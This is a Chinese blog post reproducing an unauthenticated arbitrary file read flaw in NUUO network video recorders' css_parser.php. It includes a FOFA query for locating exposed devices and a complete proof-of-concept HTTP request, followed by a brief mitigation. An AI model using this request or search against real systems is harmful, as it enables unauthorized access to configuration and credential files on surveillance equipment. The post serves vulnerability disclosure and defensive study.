【漏洞复现】NUUO网络视频录像机 css_parser.php 任意文件读取漏洞

最新推荐文章于 2024-11-16 11:12:29 发布
最新推荐文章于 2024-11-16 11:12:29 发布
阅读量508 收藏 3
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142100917
版权

1 产品简介


NUUO网络视频录像机(Network Video Recorder,简称NVR)是NUUO Inc.生产的一种专业视频监控设备,它广泛应用于零售、交通、教育、政府和银行等多个领域。能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能。它采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求。

2 漏洞概述

NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

3 复现环境

FOFA:

body="www.nuuo.com/eHelpdesk.php"

4 漏洞复现

poc

GET /css_parser.php?css=css_parser.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 

5 修复建议

关闭互联网暴露面或接口设置访问权限

 

 

 

 

 

天官赐福万无禁忌
关注
专栏目录
NUUO网络视频录像机 upload.php 任意文件上传漏洞复现
0xSec
10-28 508
NUUO网络视频录像机 upload.php 存在任意文件上传漏洞,未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell,进一步控制服务器权限。
NUUO网络视频录像机 css_parser.php 任意文件读取漏洞复现
0xSec
09-10 781
NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
NUUO智能监控解决方案 8.7.3 Crack
控件与插件之大全
07-04 171
NUUO智能监控解决方案:从闭路电视到 IP 摄像机、从基于 PC 的服务器到嵌入式 Linux 的服务器、从小规模到大规模安装,NUUO 的全系列产品 Crystal™ 系列和 MainConsole 系列提供了全面的解决方案
漏洞复现NUUO摄像头远程命令执行漏洞
m0_46381222的博客
10-30 536
漏洞复现NUUO摄像头远程命令执行漏洞
NUUO摄像头 css_parser.php 任意文件读取
iSee857的博客
09-11 516
NUUO摄像头是中国T湾NUUO公司旗下的一款网络视频记录器,NUUO网络视频录像机 css_parser.php中存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等。关闭互联网暴露面或接口设置访问权限。
NUUO 网络摄像头命令执行漏洞
weixin_45971758的博客
02-06 1518
NUUO是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。网络视频记录器的CPU为Marvell Kirkwood 88F6281,CPU架构为基于ARMv5架构。该系统中有busybox,一个精简的环境,包含了许多最常用的UNIX命令和工具,如ls、cp、mv、grep、find、awk、sed等。无法执行复杂的任务和其他架构的程序。
NUUO摄像头远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
10-26 715
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备__debugging_center_utils___.php存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意PHP代码,从而入侵服务器,获取服务器的管理员权限。
漏洞复现NUUO摄像头存在远程命令执行漏洞
失心少年
11-17 672
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。漏洞链接:http://127.0.0.1/
NUUO网络摄像头(NVR)RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-03 769
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意命令。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现NUUO NVR 摄像机 __debugging_center_utils___.php 命令执行漏洞
alert['Hello World']
07-27 529
NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器。能够适应不同的应用场景。并且是一个易于安装和可靠的系统,允许用户轻松和简单地配置和管理网络摄像机。NUUO 网络摄像头 __debugging_center_utils___.php 存在命令执行漏洞,攻击者可以通过这个漏洞在服务器上执行任意命令,完全控制权,进行非法操作、窃取和篡改敏感数据,甚至完全接管服务器,给系统的安全性带来严重威胁。
NUUO摄像头 upload.php 任意文件上传漏洞复现
iSee857的博客
10-30 678
NUUO摄像头‌是由中国台湾NUUO公司生产的一款网络视频录像机(Network Video Recorder,简称NVR),广泛应用于零售、交通、教育、政府和银行等多个领域。它能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能,采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求‌。NUUO NVR摄像头在upload.php接口处存在任意文件上传,攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。厂商已发布补丁 请即时修复。拼接上传文件进行访问。
区块链论文速读A会-SECURITY 2024 PoS区块链中紧凑高效的前向安全多重签名 附ppt
软件工程小施同学 的专栏
11-16 470
然而,一旦签名密钥被破坏,使用一般的多重签名方案将对 PoS 区块链的安全性构成严重威胁。也就是说,在对手获得足够的签名密钥后,它可以通过分叉链并修改过去某个时间点的历史记录来破坏 PoS 区块链的不可变性。目前唯一可用的 FS-MS 构造是 Drijvers 等人的 Pixel,它建立在配对组的基础上,并且仅在时间段级别实现前向安全性。作为概念验证,我们提供了Pixel+和Pixel++的实现,并进行了几个有代表性的实验,以证明Pixel+和Pixel++具有良好的具体效率并且具有实用性。
Gartner发布安全平台创新洞察:安全平台需具备的11项常见服务
lurenjia404的博客
11-14 947
安全和风险管理领导者的任务是管理多个安全供应商和复杂的基础设施堆栈。本研究提供了有关安全平台优势和风险的见解,并提供了为组织选择合适平台的建议。
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 848
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
[CKS] 执行Pod安全标准
agjllxchjy的博客
11-13 403
目前的所有题目为2024年10月后更新的最新题库,考试的k8s版本为1.31.1。
漏洞复现」某赛通电子文档安全管理系统 HookService SQL注入漏洞复现(CVE-2024-10660)
qq_39894062的博客
11-13 664
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
安全见闻8
2401_86628519的博客
11-13 1115
声明:学习视频来自b站up主 泷羽sec,如涉及侵权马上删除文章声明:本文主要用作技术分享,所有内容仅供参考。任何使用或依赖于本文信息所造成的法律后果均与本人无关。请读者自行判断风险,并遵循相关法律法规。
童年的快乐,矫平机为玩具打造安全品质
最新发布
mhtkj的博客
11-16 266
每个人的童年都充满了欢笑和快乐,玩具作为这段时光中不可或缺的伙伴,其安全性和品质尤为重要。矫平机在这个领域扮演着重要角色,它确保了玩具材料的平整和安全,为孩子们的童年增添了更多的乐趣和安心。
建筑施工特种作业人员安全生产知识试题
m0_66937659的博客
11-13 416
未发生死亡事故的,安全生产许可证有效期满时,经原安全生产许可证颁发管理机关同意,不再审查,安全生产许可证有效期延期()颁布实施,标志着安全生产成为我国现阶段建筑业工作的重点,安全生产制度被确立为促进我国建筑业发展的一项根本制度。11.根据《建设工程安全生产管理条例》,作业人员进入新的岗位或者新的施工现场前,应当接受()是安全生产领域的综合性基本法,是我国第一部全面规范安全生产的专门法律。)《中华人民共和国安全生产法》,制定《建设工程安全生产条例》。3.《中华人民共和国安全生产法》规定生产经营单位必须为(
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值